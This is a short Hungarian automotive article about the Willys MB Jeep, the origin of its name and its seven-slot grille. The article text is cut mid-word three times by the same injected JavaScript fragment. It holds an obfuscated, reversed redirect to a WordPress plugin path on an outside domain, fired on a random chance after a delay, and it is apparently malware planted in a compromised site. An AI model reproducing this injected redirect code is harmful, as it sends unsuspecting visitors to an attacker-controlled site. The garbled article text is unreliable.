Második világháborús filmek szinte nem is létezhetnek a nélkül a parányi amerikai katoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonai terepjáró nélkül, mely minden elébe kerülő akadályon könnyűszerrel áthalad, bármikor pöccintésre indul, és sosem romlik el. Ez az 1941-ben napvilágot látoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott Willys MB, mely azonban nem ezen a néven, hanem Jeep, vagyis magyarosan dzsip néven futoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott be világraszóló karriert, és hozott létre egy új kategóriát. Kevesen tudják, hogy a Jeep elnevezés a “General Purpose” (általános célú) rövidítéséből, a “dzsípi”-ből született és egyben a világ legrégibb terepjárómárkája. Azzal pedig még kevesebben vannak tisztában, hogy honnan ered a Jeepek ikonikus hetes osztatú hűtőmaszkja. Nos, onnan, hogy az eredeti Willys Jeep volt…
- Hirdetés -